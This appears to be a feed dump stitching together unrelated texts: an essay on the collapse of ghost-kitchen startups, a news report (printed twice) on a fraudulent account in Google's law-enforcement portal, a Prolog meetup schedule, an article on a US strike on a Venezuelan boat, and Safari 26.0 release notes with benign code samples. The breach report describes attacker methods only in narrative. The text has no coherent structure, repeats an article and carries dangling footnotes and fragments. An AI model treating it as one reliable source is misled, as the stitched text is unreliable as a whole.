The kitchen itself operates like a factory assembly line. One space prepares food for multiple virtual restaurant brands³. The same cook making your "authentic" Italian pasta also flips burgers for a completely different brand name. Then switches to preparing tacos for a third virtual restaurant. All from the same kitchen. All with different logos on the delivery apps.
These facilities rent space in industrial areas where the rent costs less. No need for prime real estate. No foot traffic required. No parking spaces. No bathroom maintenance. No dining room cleaning.
The promise sounded perfect. Lower costs. Higher profits. Multiple revenue streams from one location.
The numbers, however, tell the brutal story of the ghost kitchen. Companies raised over $3 billion in venture capital from 2020 to 2022¹. Today, the industry's leaders are shutting down, pivoting away from physical operations, or laying off staff in waves.
You were sold efficiency. You got financial ruin.
The Collapse of the Ghost Kitchen Giants
Kitchen United raised $100 million in July 2022, including funding from grocery giant Kroger². Fifteen months later, the company shut down all eight of its Kroger locations². That represented 44% of Kitchen United's entire 18-unit footprint². The company then announced it would sell or close every remaining physical location and pivot to "software only"³.
Translation: We burned through $100 million and have nothing left to show for it.
CloudKitchens raised $850 million in November 2021 at a $15 billion valuation from investors including Microsoft⁴. By early 2023, the company's facilities were running at only 50% occupancy³. Internal data showed that 41 out of 71 restaurants at five CloudKitchens locations closed within one year³. That's a 58% failure rate.

The company responded with staff layoffs and location closures throughout 2023⁵.
Nextbite endured three rounds of layoffs within 14 months before selling to competitor Sam Nazarian⁴. Celebrity-backed brands like Hotbox by Wiz Khalifa and George Lopez Tacos generated terrible reviews and vanishing sales.

Reef lost its partnership with Wendy's after promising 700 delivery kitchen locations⁵. The deal that was supposed to define the industry's future collapsed completely.
The Hidden Economics That Killed Profitability
Ghost kitchens promised lower costs. The math never worked. Delivery apps charge restaurants up to 30% commission fees⁵. Ghost kitchen operators add rent plus percentage fees on top. Equipment repairs and maintenance create constant expenses. Marketing costs multiply when you have no storefront presence.
Layering these costs together, restaurants discovered a devastating truth: there wasn't enough money left for anyone to make a profit.
Quality control became impossible. Shared kitchen facilities meant that one staff member prepared food for multiple brands simultaneously. No ownership. No accountability. Just assembly-line cooking with zero connection to customers.
When food arrived cold or wrong, customers had no relationship with the brand to forgive mistakes. No loyal regulars. No servers to smooth over problems. Just angry reviews that destroyed virtual brands forever. No reason for repeat business.
The Numbers Behind the Collapse
The global ghost kitchen market was valued at $58.61 billion in 2022⁵. Industry projections show growth to $177.85 billion by 2032⁵. But these projections ignore the operational reality killing companies today.

Approximately 7,606 ghost kitchen operations remain active across the United States⁵. This sounds substantial until you realize how many have closed, pivoted, or failed in the past two years.

The highest-performing ghost kitchens report profit margins between 10-30%⁵. Traditional restaurants typically see margins of 3-5%⁵. But these numbers ignore the failure rates. When 58% of restaurants in your facility close within twelve months, your occupancy and revenue collapse.
Quality Became the Fatal Flaw
Food that travels well requires different recipes, different ingredients, different packaging. Most restaurants never figured this out. Ghost kitchens became synonymous with disappointing food experiences.
Virtual brands with celebrity names generated initial curiosity. But customers who ordered Packed Bowls by Wiz Khalifa once rarely reordered after experiencing cold food and small portions⁵. One Cincinnati operator threw away half his stock of Wiz Khalifa ingredients because customers wouldn't come back⁵.
The first lesson is that name recognition without quality execution equals business failure.
There Is No Connection
When you remove the human connection between restaurant and customer, you remove everything that makes people loyal to restaurants. When food travels twenty minutes in a bag, quality suffers. When customers have problems, there's no manager to smooth things over.
Ghost kitchens became digital fast food factories. Anonymous. Disposable. Forgettable.
The second lesson is that restaurants aren't just about food. They're about places. People. Experiences. Community.
What Actually Works
Focus on your core restaurant first. Make it profitable. Build loyal customers. Control your kitchen. Control your quality. Build a human connection.
If you want to expand, open a second location. Own or lease the space directly. Build your brand in the community. Skip the middleman operators. Skip the celebrity partnerships. Skip the virtual brands with made-up names.
The restaurant business has no shortcuts. It never did. It never will.
The $15 billion lesson is that real restaurants serve real customers in real locations, with real people. Everything else is just an expensive distraction.
9. "Nextbite's failures are a warning for the entire virtual restaurant industry." Nation's Restaurant News, June 14, 2023.
If you want more straight talk about what actually works in restaurants, follow me. No charge. No bullshit. Just the truth about running profitable food businesses from someone who has seen every mistake you're about to make.
I write for operators who want real answers. Not marketing speak. Not consultant double-talk. Just the hard-earned lessons that separate successful restaurants from expensive failures.
Your competition is reading industry magazines full of fluff. You'll get the unvarnished reality that keeps places profitable.
Follow for free. Unsubscribe anytime. Your call.
Google confirms hackers gained access to law enforcement portal
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 21:12:37
Google has confirmed that hackers created a fraudulent account in its Law Enforcement Request System (LERS) platform that law enforcement uses to submit official data requests to the company.
"We have identified that a fraudulent account was created in our system for law enforcement requests and have disabled the account," Google told BleepingComputer.
"No requests were made with this fraudulent account, and no data was accessed."
The FBI declined to comment on the threat actor's claims.
This statement comes after a group of threat actors calling itself "Scattered Lapsus$ Hunters" claimed on Telegram to have gained access to both Google's LERS portal and the FBI's eCheck background check system.
The group posted screenshots of their alleged access shortly after announcing on Thursday that they were "going dark."
Screenshot shared by threat actors
The hackers' claims raised concerns as both LERS and the FBI's eCheck system are used by police and intelligence agencies worldwide to submit subpoenas, court orders, and emergency disclosure requests.
Unauthorized access could allow attackers to impersonate law enforcement and gain access to sensitive user data that should normally be protected.
The "Scattered Lapsus$ Hunters" group, which claims to consist of members linked to the Shiny Hunters, Scattered Spider, and Lapsus$ extortion groups, is behind widespread data theft attacks targeting Salesforce data this year.
The threat actors initially utilized social engineering scams to trick employees into connecting Salesforce's Data Loader tool to corporate Salesforce instances, which was then used to steal data and extort companies.
The threat actors later breached Salesloft's GitHub repository and used Trufflehog to scan for secrets exposed in the private source code. This allowed them to find authentication tokens for Salesloft Drift, which were used to conduct further Salesforce data theft attacks.
Google Threat Intelligence (Mandiant) has been a thorn in the side of these threat actors, being the
first to disclose
the Salesforce and
Salesloft attacks
and warning companies to shore up their defenses.
Since then, the threat actors have been taunting the FBI, Google, Mandiant, and security researchers in posts to various Telegram channels.
Late Thursday night, the group posted a lengthy message to a BreachForums-linked domain causing some to believe the threat actors were retiring.
"You may see our names in new databreach disclosure reports from the tens of other multi billion dollar companies that have yet to disclose a breach, as well as some governmental agencies, including highly secured ones, that does not mean we are still active."
However, cybersecurity researchers who spoke with BleepingComputer believe the group will continue conducting attacks quietly despite their claims of going dark.
Google confirms fraudulent account created in law enforcement portal
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 21:12:37
Google has confirmed that hackers created a fraudulent account in its Law Enforcement Request System (LERS) platform that law enforcement uses to submit official data requests to the company [...]...
Google has confirmed that hackers created a fraudulent account in its Law Enforcement Request System (LERS) platform that law enforcement uses to submit official data requests to the company
"We have identified that a fraudulent account was created in our system for law enforcement requests and have disabled the account," Google told BleepingComputer.
"No requests were made with this fraudulent account, and no data was accessed."
The FBI declined to comment on the threat actor's claims.
This statement comes after a group of threat actors calling itself "Scattered Lapsus$ Hunters" claimed on Telegram to have gained access to both Google's LERS portal and the FBI's eCheck background check system.
The group posted screenshots of their alleged access shortly after announcing on Thursday that they were "going dark."
Screenshot shared by threat actors
The hackers' claims raised concerns as both LERS and the FBI's eCheck system are used by police and intelligence agencies worldwide to submit subpoenas, court orders, and emergency disclosure requests.
Unauthorized access could allow attackers to impersonate law enforcement and gain access to sensitive user data that should normally be protected.
The "Scattered Lapsus$ Hunters" group, which claims to consist of members linked to the Shiny Hunters, Scattered Spider, and Lapsus$ extortion groups, is behind widespread data theft attacks targeting Salesforce data this year.
The threat actors initially utilized social engineering scams to trick employees into connecting Salesforce's Data Loader tool to corporate Salesforce instances, which was then used to steal data and extort companies.
The threat actors later breached Salesloft's GitHub repository and used Trufflehog to scan for secrets exposed in the private source code. This allowed them to find authentication tokens for Salesloft Drift, which were used to conduct further Salesforce data theft attacks.
Google Threat Intelligence (Mandiant) has been a thorn in the side of these threat actors, being the first to disclose the Salesforce and Salesloft attacks and warning companies to shore up their defenses.
Since then, the threat actors have been taunting the FBI, Google, Mandiant, and security researchers in posts to various Telegram channels.
Late Thursday night, the group posted a lengthy message to a BreachForums-linked domain, causing some to believe the threat actors were retiring.
"You may see our names in new databreach disclosure reports from the tens of other multi billion dollar companies that have yet to disclose a breach, as well as some governmental agencies, including highly secured ones, that does not mean we are still active."
However, cybersecurity researchers who spoke with BleepingComputer believe the group will continue conducting attacks quietly despite their claims of going dark.
Update 9/15/25: Article title updated as some felt it indicated a breach.
The 3rd Scryer Prolog Meetup will take place on Nov. 13th and 14th 2025 at the Hochschule Düsseldorf in Düsseldorf, Germany.
This meetup is an excellent opportunity to learn more about the latest developments and applications of Scryer Prolog, a modern, free, ISO-compliant Prolog system.
Thursday, Nov. 13th 2025
10.00–11.00
Mark Thom: Recent progress in Scryer Prolog and current developments
11.00–12.00
Kauê Hunnicutt Bazilli: The Rust, C and Wasm embedding APIs of Scryer Prolog
12.00–13.30
Lunch break
13.30–14.30
David C. Norris: The DEDUCTION Programme – Dose Escalation Designs in Universal Context of Titration for Oncology Drug Development
14.30–15.00
Coffee break
15.00–15.30
Jonathan McHugh: Guix OS and Scryer – Prolog With Added Func
15.30–17.00
Ulrich Neumerkel: Current developments in the Prolog ISO standard, systematic testing of Prolog implementations
Starting at 19.00
Dinner
Friday, Nov. 14th 2025
10.00–11.00
Christian Jendreiko and Björn Lellmann: An update on recent applications of Scryer Prolog in Quantum Mechanics and Music Theory
11.00–12.00
Kauê Hunnicutt Bazilli and Bryan-Elliott Tam: Bakage, a package manager for Prolog systems
12.00–13.30
Lunch break
13.30–14.00
Daniel K. Hashimoto: Towards an Implementation-Independent Interface for Reasoning about Semantic Web in Prolog
14.00–14.30
Barnabás Zahorán and Bennet Bleßmann: plwm – An X11 window manager written in Prolog
14.30–15.00
Coffee break
15.00–16.00
Michael Leuschel: Using Prolog to Translate B and Set Theory to Answer Set Programming
16.00–17.00
James J. Tolton: TBD
Starting at 19.00
Dinner
Pentagon Barred Senior House Staffers From Briefing on Venezuela Boat Strike
Intercept
theintercept.com
2025-09-15 20:51:03
A former Pentagon official says “U.S. forces went out and committed murder" in the drone strike off the coast of Venezuela.
The post Pentagon Barred Senior House Staffers From Briefing on Venezuela Boat Strike appeared first on The Intercept....
The Department of War is thwarting congressional oversight of the Trump administration’s attack on a boat off the coast of Venezuela earlier this month.
Senior staff from House leadership and relevant committees were barred by the Office of the Secretary of War from attending a briefing on the attack last Tuesday, according to three government sources who spoke on the condition of anonymity. The military cited “alternative compensatory control measures” — the term for enhanced security procedures designed to keep information under wraps — as the reason.
The War Department has attempted to conceal numerous details about the attack that killed 11 people in the Caribbean, including the fact that the vessel altered its course and appeared to have turned back toward shore prior to the strikes. Men on board were said to have survived an initial strike, The Intercept reported last week. They were then killed shortly after in a follow-up attack.
“I’m incredibly disturbed by this new reporting that the Trump Administration launched multiple strikes on the boat off Venezuela,” Rep. Sara Jacobs, D-Calif., a member of the House Armed Services Committee’s Subcommittee on Intelligence and Special Operations, said of The Intercept’s coverage. “They didn’t even bother to seek congressional authorization, bragged about these killings — and teased more to come.”
A very small number of Senate and House staffers, mostly from the Armed Services committees, received highly classified briefings about the attack last Tuesday, after the military delayed the meeting for days. Staff for key members of the Senate Foreign Relations Committee and the House Foreign Affairs Committee, which oversee war powers, were conspicuously absent.
Briefers from the office of the Assistant Secretary of Defense for Special Operations/Low-Intensity Conflict, the civilian Pentagon appointee who oversees special operations, made it clear that the attack was not a one-off and that lethal operations would continue, according to three sources familiar with the meetings. The Department of War did not send a lawyer to the briefing, so no expert was available to comment on the legality of the attack.
A senior defense official pushed back on claims that the Pentagon was stymying oversight. “The Department did not bar senior staff from House leadership and relevant committees from attending this briefing,” said the official. “The Department briefed House and Senate Leadership and relevant oversight committee staff with proper security clearance access.”
Pentagon press secretary Kingsley Wilson offered a stale quote from chief spokesperson Sean Parnell (previously published by The Intercept) in response to a request for comment about unconfirmed reports to The Intercept that men aboard the vessel attempted to surrender prior to being killed.
In a letter to the White House on Wednesday, Sen. Tim Kaine of Virginia and two dozen fellow Democratic senators said the Trump administration has provided “no legitimate legal justification” for the strike. The senators requested answers to 10 key questions regarding the facts surrounding the attack and its supposed legal underpinnings.
“For decades, Congress has wrongly ceded responsibility to the President about when to declare war, and now we’re living with those consequences,” Jacobs told The Intercept. “This is why it’s never been more important for Congress to reclaim our war powers responsibilities and ensure thorough oversight and transparency into all of the Trump Administration’s military actions.”
Last week, Rep. Ilhan Omar, D-Minn., introduced a war powers resolution seeking to stop the Trump administration from conducting future strikes in the Caribbean. Omar told The Intercept that it was designed to “terminate hostilities against Venezuela, and against the transnational criminal organizations that the Administration has designated as terrorists this year.”
One former Pentagon legal expert thinks framing the issue around war is a mistake. In her view, this is a clear-cut case of murder.
“A war framing confuses the issue. This is not a war.”
Sarah Harrison, who advised military leaders on legal issues related to human rights and extrajudicial killings in her former role as associate general counsel at the Pentagon’s Office of General Counsel, International Affairs, says that framing the attack in the Caribbean as an act of war is a categorical error. “A war framing confuses the issue. This is not a war,” she explained. “U.S. forces went out and committed murder.”
The legal issues at play were simple, she said: “There was no armed attack on the United States that would allow for the U.S. to use force in self-defense. There is no armed conflict between the United States and any cartel group or any Latin American country. A foreign terrorist designation of any of these groups does not change that. It does not authorize force against those groups.”
“The killing of all 11 of these men was illegal. This was a premeditated murder of suspected criminals — by definition, civilians — based on the facts provided by the administration themselves,” she told The Intercept.
“This president believes that he can kill anyone, anywhere, under any circumstances and not have to rationalize it.”
Sarah Yager, a former senior adviser on human rights to the chair of the Joint Chiefs of Staff and now the Washington director at Human Rights Watch, echoed these concerns. “This president believes that he can kill anyone, anywhere, under any circumstances and not have to rationalize it — and that he will be impugned from any accountability,” she said. “I think this should be a real concern for everyone, that the rule of law is being undermined, and we don’t know what restraints there are on the use of force.”
Harrison, now a senior analyst at the International Crisis Group, emphasized that Secretary of State Marco Rubio made clear that the U.S. could have halted the ship and arrested the crew but chose to kill them instead. “Instead of interdicting it, on the president’s orders, we blew it up — and it’ll happen again,” Rubio boasted.
“Under domestic law, and it’s the same rule under international human rights law, the use of lethal force can only be executed if there is an imminent threat to life or serious bodily injury,” said Harrison. “Rubio’s statements underscore the fact that there was no such threat.” She noted that the U.S. military is prohibited by law from executing civilians under the Uniform Code of Military Justice; Title 18 of the U.S. Code, which includes the federal murder statute; and under a long-standing executive order that bans assassinations.
Multiple sources say that Special Operations Command, or SOCOM, conducted the lethal operation. This is considered highly unusual given all the other military assets based in the region. Col. Allie Weiskopf, SOCOM’s director of public affairs, would not comment on the command’s involvement in the attack. “We don’t have anything for you,” she told The Intercept.
Sen. Rand Paul, R-Ky., and others told The Intercept the boat was attacked by one or more drones. Harrison said that the special operators who conducted the strike should be made aware that they complied with an unlawful order. She called on members of Congress to speak out on the issue.
The U.S. has continued to ratchet up tension in the Caribbean. Personnel from a U.S. warship boarded a Venezuelan tuna boat with nine fishermen while it was sailing in Venezuelan waters on Saturday, according to Venezuela’s Foreign Minister Yván Gil. The boat was, he said, “illegally and hostilely boarded by a United States Navy destroyer” and 18 armed U.S. personnel remained on the vessel for eight hours. The fishermen were then released.
“We don’t have anything to offer you on this,” said a spokesperson for the Office of the Secretary of War in response to a request for comment on the incident and an explanation of how raiding a tuna boat contributes to U.S. national security.
Venezuelan officials believe Trump may be renewing long-running efforts, which failed during his first term, to topple President Nicolás Maduro’s government. Maduro and several close allies were indicted in a New York federal court in 2020 on federal charges of narco-terrorism and conspiracy to import cocaine. Last month, the U.S. doubled its reward for information leading to Maduro’s arrest to $50 million.
The Trump administration added the Venezuelan Cartel de los Soles, or Cartel of the Suns, to a list of specially designated global terrorist groups earlier this year, alleging that it is headed by Maduro and high-ranking officials in his administration. In July, Trump also signed a secret directive ordering the Pentagon to use military force against some Latin American drug cartels he has labeled terrorist organizations.
The United States has been surging military assets into the Caribbean for weeks. F-35 stealth fighters landed in Puerto Rico on Saturday afternoon, joining one of the largest U.S. military deployments to the Caribbean in years. This includes around 4,500 U.S. personnel — including Marines and sailors from the 22nd Marine Expeditionary Unit — seven U.S. warships, and one nuclear-powered attack submarine. And at least two MQ-9 Reaper drones were spotted at Coast Guard Air Station Borinquen in Puerto Rico last week. The U.S. is also engaged in the rapid restoration and re-outfitting of the former Roosevelt Roads Naval Station in Ceiba, Puerto Rico, which officially closed in 2004.
The 22nd MEU is operating with the amphibious assault ship USS Iwo Jima and the amphibious transport dock ships USS San Antonio and USS Fort Lauderdale. Last Monday, Secretary of War Pete Hegseth visited the Iwo Jima. “What you’re doing right now — it’s not training,” he told troops on board. “This is the real-world exercise on behalf of the vital national interests of the United States of America to end the poisoning of the American people.”
Speaking on Fox News, Hegseth did not rule out regime change by the U.S. in Venezuela. “That’s a presidential-level decision, and we’re prepared with every asset that the American military has,” he said.
Jacobs, the California representative, fears that the boat attack in the Caribbean may be the opening salvo of another long-running U.S. military disaster akin to the post-9/11 wars that continue to grind on across the globe today. “We can’t let Donald Trump drag us into another forever war that our youngest generations will pay for with their lives and tax dollars,” she told The Intercept.
We’re happy to share with you what’s arriving in Safari 26.0! It includes big exciting new features, many important improvements, and lots of attention to detail. We can’t wait to see what you do with Anchor Positioning, Scroll-driven animations, High Dynamic Range images, the new HTML <model> element, the all-new Digital Credentials API, SVG icon support, WebGPU, WebKit in SwiftUI, and much, much more.
Now every site can be a web app on iOS and iPadOS. Safari in visionOS supports a wider range of immersive media, with spatial videos, Apple Immersive Video, and 180°, 360° & Wide FOV videos. Users can report issues they are having with websites directly from Safari. And there are new features for Web Inspector, Web Extensions, Content Blockers, Lockdown Mode, Device Management, WebKit API and more.
Safari 26.0 adds 75 new features, 3 deprecations, and 171 other improvements. That’s 12% more features and 59% more bug fixes than we announced in June at WWDC.
CSS
Anchor Positioning
Anchor positioning is a new layout mechanism for anchoring one element to another on the web. It pairs well with the popover attribute (which shipped in Safari 17.0), making it easy to create responsive menus, tooltips and more.
The easiest way to use anchor positioning is by using position-area, which lets you position elements (the “anchor-positioned”) in pre-defined areas relative to another element (the “anchor”). For example, to position an element on the top right corner of an anchor, it’s as simple as position-area: top right:
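The interactive demo isn’t reproduced here, but a minimal sketch of the pattern (the class names are illustrative) looks like this:

.anchor {
    anchor-name: --my-anchor; /* register this element as an anchor */
}
.tooltip {
    position: absolute;
    position-anchor: --my-anchor; /* tie the positioned element to the anchor */
    position-area: top right;     /* place it in the anchor's top right area */
}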
For more advanced use cases, the anchor() CSS function calculates the inset value required to line up the edges of the anchor and anchor-positioned elements together. This example achieves the same effect as above, but using anchor() instead:
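As a sketch with the same illustrative class names, the anchor() version could be written as:

.tooltip {
    position: absolute;
    position-anchor: --my-anchor;
    bottom: anchor(top);  /* the tooltip's bottom edge meets the anchor's top edge */
    left: anchor(right);  /* the tooltip's left edge meets the anchor's right edge */
}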
Above, the anchor(top) in bottom: anchor(top) calculates to a value that lines up the bottom edge of the anchor-positioned element with the top edge of the anchor. Similarly, left: anchor(right) lines up the left edge of the anchor-positioned element with the right edge of the anchor.
As anchor() calculates to a value, it can be used in calc() for more advanced use cases: exact-to-the-pixel layout, anchoring to multiple anchors, or animated anchors. But for everything else, just stick to the pre-defined areas using position-area.
The position-area syntax came from a proposal we put together, as we thought about how developers would use Anchor Positioning, and how overwhelming it’d be to manually line up edges together using anchor().
You can also use position-try to provide alternative positions when there’s not enough room to display the element. For example, to place the element on the bottom right corner when there isn’t enough space on the top right corner, use position-try: bottom right.
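Continuing the sketch above, that fallback is one extra declaration:

.tooltip {
    position-area: top right;
    position-try: bottom right; /* used when the top right area overflows */
}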
Scroll-driven animations
Scroll-driven animations let you tie CSS animations either to how far the user has scrolled, or to how far particular content has moved through the viewport, in and out of view.
For example, let’s imagine you want to animate a group of items as they scroll into view. You can declare that you want the animation to be tied to whether or not they are in view with animation-timeline: view(), and specify that the animation should begin just as each item is 0% visible and end when they are 50% across the viewport with animation-range: 0% 50%.
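A compact sketch of that setup (the keyframes are illustrative):

.item {
    animation: fade-in linear both;
    animation-timeline: view();  /* drive the animation by the item's visibility */
    animation-range: 0% 50%;     /* start at 0% visible, end halfway across the viewport */
}
@keyframes fade-in {
    from { opacity: 0; transform: translateY(2rem); }
    to   { opacity: 1; transform: none; }
}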
Watch What’s new in Safari and WebKit at WWDC25 to see the full walkthrough of this example, and learn more about what’s possible with Scroll-driven animations.
Pretty text
Safari 26.0 adds support for text-wrap: pretty. Our implementation of pretty adjusts how text wraps in an effort to even out the ragged edge, improve hyphenation, and prevent short last lines.
In WebKit, all lines of text in an element are improved by pretty, not just a select group of lines at the end of the paragraph. To learn more, read Better typography with text-wrap pretty.
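Opting in is a single declaration, for example:

p {
    text-wrap: pretty; /* evens out the ragged edge and avoids short last lines */
}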
Contrast Color
Safari 26.0 adds support for the contrast-color() function. It gives you the chance to declare a color that’s either black or white, depending on which will provide more contrast with a second color.
For example, we can make a button with the background color of var(--button-color), and then ask the browser to set the text color to either black or white, whichever one provides more contrast against that background.
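A minimal sketch of that button:

button {
    background-color: var(--button-color);
    color: contrast-color(var(--button-color)); /* black or white, whichever contrasts more */
}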
Now, when the --button-color variable is set, both the background and text colors are chosen.
Safari 26.0 adds support for the CSS progress() function. It’s a math function that returns a number value representing how far along something is, how much progress it’s made between two other values.
Let’s imagine at a particular moment, the container is 450px wide. That’s half way in-between 300px and 600px. The progress() function will calculate this to be 50% using this formula:
progress = (value − start) / (end − start), here (450 − 300) / (600 − 300) = 0.5, or 50%
The result is always a number without any unit. Notice you can mix lengths with different units.
Be mindful that currently progress() doesn’t clamp. So it won’t stop at 0% or 100%. It will just grow above 100%, or shrink down below 0%.
The progress() function is most powerful when used with other complex math. Combine it with animations, gradients, or scroll timelines, and connect one set of conditions with another. There might be even more functions with which it could be combined coming to CSS in the future.
And more CSS
Safari 26.0 now supports the margin-trim: block inline syntax for trimming in both directions. Learn all about margin-trim and what the block inline value does in Easier layout with margin-trim.
The overflow-block and overflow-inline properties are supported in Safari 26.0. They are the logical versions of overflow-x and overflow-y, making it even easier to write robust code that supports multiple languages.
Safari 26.0 supports the self-alignment properties align-self and justify-self in absolute positioning.
There are two features in CSS that are new since the Safari 26 beta announcements at WWDC25. Safari 26.0 now supports the animation-range, animation-range-start, animation-range-end, and animation-timeline properties for ::marker. It also adds support for declarations placed directly inside an @scope rule without a style rule ancestor.
Every site can be a web app on iOS and iPadOS
Since January 2008 with iPhone OS 1.1.3, users on iPhone could add website icons to their Home Screen for quick access. Tapping the icon opened the site in Safari. By August 2008 with iPhone OS 2.1, web developers could instead trigger their site to appear in an app-like “standalone mode” by adding the <meta name='apple-mobile-web-app-capable'> tag to the HTML head.
In 2013, the W3C began standardizing Web Application Manifests to make configuring web app behavior possible with a JSON manifest file. Browser support started in November 2014, and Safari adopted in March 2018 with iOS 11.4.
For the last 17 years, if the website had the specific meta tag or Web Application Manifest display value in its code, when a user added it to their Home Screen on iOS or iPadOS, tapping its icon opened it as a web app. If the website was not configured as such, tapping its icon opened the site in a browser. Users had no choice in the matter, nor a visible way to understand why some sites behaved one way while others behaved another.
On Mac, we took a different approach. When introducing Web Apps on Mac in Sep 2023, we made the decision to always open websites added to the Dock as web apps. It doesn’t matter whether or not the website has a Web Application Manifest. Users get a consistent experience. Add to Dock creates a web app.
Now, we are revising the behavior on iOS 26 and iPadOS 26. By default, every website added to the Home Screen opens as a web app. If the user prefers to add a bookmark for their browser, they can disable “Open as Web App” when adding to Home Screen — even if the site is configured to be a web app. The UI is always consistent, no matter how the site’s code is configured. And the power to define the experience is in the hands of users.
This change, of course, is not removing any of WebKit’s current support for web app features. If you include a Web Application Manifest with your site, the benefits it provides will be part of the user’s experience. If you define your icons in the manifest, they’re used.
We value the principles of progressive enhancement and separation of concerns. All of the same web technology is available to you as a developer, to build the experience you would like to build. Giving users a web app experience simply no longer requires a manifest file. It’s similar to how Home Screen web apps on iOS and iPadOS never required Service Workers (as PWAs do/did on other platforms), yet including Service Workers in your code can greatly enhance the user experience.
Simply put, there are now zero requirements for “installability” in Safari. Users can add any site to their Home Screen and open it as a web app on iOS 26 and iPadOS 26.
HDR images
The human eye can typically handle seeing things lit by bright light and sitting in dark shadows at the same time. The contrast your eyes see between brightness and darkness is called dynamic range, and it’s very challenging to reproduce.
As digital photography and videography improved by leaps and bounds over the years, the ability to digitally capture a dynamic range has greatly improved. The High Dynamic Range (HDR) format takes this even further, allowing you to capture both a wider dynamic range and increased color gamut, creating more vivid and realistic-looking images and video. Parallel breakthroughs in display technology have made it possible to present such images for others to view, with deep true blacks, pure bright whites and dramatic nuances in between.
WebKit shipped support for HDR video in 2020, in Safari 14.0. Now, in Safari 26.0 for iOS 26, iPadOS 26, macOS 26 and visionOS 26, WebKit adds support for HDR images on the web. You can embed images with high dynamic range into a webpage, just like other images — including images in WebGPU Canvas.
WebKit for Safari 26.0 also adds support for the new dynamic-range-limit property in CSS. This property lets you control what happens when presenting a mix of standard dynamic range (SDR) and HDR video or images together. Safari 26.0 supports the no-limit and standard values. Using no-limit tells the browser to let content be as is — HDR content is presented in HDR. Using standard converts all of the HDR content to SDR, and displays it within the limits of standard dynamic range. Doing so prevents HDR images and video from appearing overly bright or out of place next to SDR content, which can be especially helpful when users or third-parties provide content.
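As a sketch, clamping user-provided media to SDR could look like this (the selector is illustrative):

.user-content img,
.user-content video {
    dynamic-range-limit: standard; /* present HDR content within SDR limits */
}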
Immersive video and audio on visionOS
Safari in visionOS 26 now supports a wider range of immersive media, including spatial videos and Apple Immersive Video, and 180°, 360°, and Wide FOV (field of view) videos that conform to the new Apple Projected Media Profile (APMP). Embed your video on a webpage, and let users play it back immersively on a curved surface in 3D space.
This support includes HTTP Live Streaming for all of these immersive media types. The existing HLS tools have been updated to support APMP segmentation, and the HLS specification has been updated with information on how to identify immersive media in an HLS manifest file.
Now on visionOS, Safari supports the <model> element. It’s a brand new HTML element that’s similar to img or video — only now you can embed interactive 3D models into the webpage, and let users interact with them with a single attribute. And if they want to see your models in their own space at real size, they can drag the models off the page with a single gesture.
Basic usage
The syntax for showing a model is simple. Using the same USDZ files that work with AR Quick Look today, you can set the src attribute of the model element:
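The original snippet isn’t reproduced here; a minimal sketch (the file names are illustrative):

<model src="teapot.usdz">
    <img src="fallback/teapot.jpg" alt="a teapot">
</model>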
Lighting is an important part of making your 3D content look good, and the model element makes that straightforward too. You can apply an environment map as any image, including the high-dynamic range OpenEXR .exr and Radiance HDR .hdr formats, by setting the environmentmap attribute:
<model src="teapot.usdz" environmentmap="night.hdr">
    <img src="fallback/teapot-night.jpg" alt="a teapot at night">
</model>
Animation and playback
You can work with models containing animated content too. Use the autoplay attribute to declaratively set a model’s animation to run as soon as it loads, and keep the animation going using the loop attribute:
<model autoplay loop src="teapot-animated.usdz">
    <img src="fallback/teapot-animated.jpg" alt="a teapot with a stowaway!">
</model>
or use the JavaScript API for more fine-grained control:
const model = document.querySelector('model');
model.playbackRate = 0.5; // set 50% speed
model.currentTime = 6;    // set the animation to 6 seconds in
model.play();
Rotation and interaction
To let users spin and tumble a model themselves, set the model’s stagemode attribute to orbit and everything will be handled for you.
<model stagemode="orbit" src="teapot.usdz">
    <img src="fallback/teapot-orbit.jpg" alt="a teapot for examining">
</model>
Or if you’re after programmatic control, models can be scaled, rotated and moved (translated) using their entityTransform property, which takes a DOMMatrix value. You can compose these with functions like translate, rotate and scale3d to orient the model the way you want.
<model id="rotating-teapot" src="teapot.usdz">
    <img src="fallback/teapot-rotater.jpg" alt="a teapot for turning">
</model>
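A sketch of driving that markup from script (the transform values are illustrative):

const teapot = document.querySelector('#rotating-teapot');
// Compose a DOMMatrix: rotate 45 degrees around the y-axis, then scale down.
teapot.entityTransform = new DOMMatrix()
    .rotate(0, 45, 0)
    .scale3d(0.5);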
WebKit for Safari 26.0 adds support for the W3C’s Digital Credentials API. In jurisdictions that have issued such credentials, this API allows a website to securely request identity documents (like a driver’s license) from Apple Wallet or other iOS applications that have registered themselves as an Identity Document Provider.
The Digital Credential API is useful for situations where a high-trust credential is needed to access a service online (perhaps renting an automobile). It provides a much safer and more user-friendly alternative to, for example, a user uploading a photograph of their driver’s license.
The Digital Credentials API leverages the existing Credential Management API and introduces a “digital” member for requesting identity documents. Requesting an identity document relies on the ISO/IEC 18013-7 Annex C international standard, which is identified by the protocol string "org-iso-mdoc".
For example, to request an end-user’s driver’s license, you might do something like this. Create a button in HTML:
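The HTML snippet isn’t reproduced here; a minimal sketch (the id and wiring are illustrative):

<button id="verify-identity" type="button">Verify your identity</button>
<script>
    // The request below must be triggered by a user gesture.
    document.getElementById('verify-identity')
        .addEventListener('click', verifyIdentity);
</script>

Then handle the click in JavaScript: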
async function verifyIdentity() {
    try {
        // Server-generated and cryptographically signed request data.
        const response = await fetch("drivers/license/data");
        const data = await response.json();
        // Create the request.
        const request = {
            protocol: "org-iso-mdoc",
            // What is being requested, e.g. person's driving privileges
            data,
        };
        // Perform presentment request.
        // Must be done through a user gesture!
        const credential = await navigator.credentials.get({
            mediation: "required",
            digital: {
                requests: [request],
            },
        });
        // Send credential to server for decryption.
        const decryptResponse = await fetch("/decrypt", {
            method: "POST",
            body: JSON.stringify(credential.data),
            headers: {
                'Content-Type': 'application/json'
            }
        });
        // Display it...
        const json = await decryptResponse.json();
        presentDetails(json);
    } catch (err) {
        // Deal with any errors...
    }
}
New since WWDC, the Digital Credentials API now includes support for the DigitalCredential.userAgentAllowsProtocol() static method. This method allows you to check if a particular digital credential request protocol is allowed. For example:
if (DigitalCredential.userAgentAllowsProtocol("org-iso-mdoc")) {
// Create an mDoc request
} else {
// Fallback to some other credential request format
}
By the way, Digital Credentials is not yet supported in WKWebView. You can follow WebKit bug 268516 for updates. Also, the Digital Credentials API currently has a known issue where mixed protocol requests containing both OpenID4VP and ISO 18013-7 (Annex C) protocols may cause an infinite loading spinner on iOS when scanning QR codes from Chrome on macOS during cross-device identity verification flows.
Web API
